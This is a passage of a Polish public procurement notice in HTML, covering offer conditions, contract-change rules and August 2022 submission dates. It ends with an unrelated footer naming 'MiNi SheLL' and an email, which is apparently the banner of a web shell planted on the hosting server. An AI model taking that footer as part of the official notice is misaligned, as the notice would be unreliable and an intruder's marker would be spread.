złożenia podmiotowych środków dowodowych wraz z ofertą, zaleca się złożenie oświadczenia o ich aktualności i możliwości wykorzystania ich jako środki służące do oceny spełniania warunków udziału w niniejszym postępowaniu – na załączniku nr 10 do SWZ.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany treści umowy wymagać będą formy pisemnej pod rygorem nieważności.<br/>2. Niedopuszczalna jest pod rygorem nieważności zmiana istotnych postanowień umowy <br/>w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że:<br/>a) Zamawiający przewidział możliwość dokonania takiej zamiany w ogłoszeniu o zamówieniu lub Specyfikacji Warunków Zamówienia, poprzez określenie ich zakresu, charakteru oraz warunków wprowadzenia takich zmian, <br/>b) Wynikają one z zapisów art. 454 lub art.455 ustawy prawo zamówień publicznych. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-08-18 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://portal.smartpzp.pl/6wog/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-08-18 09:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-09-16</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com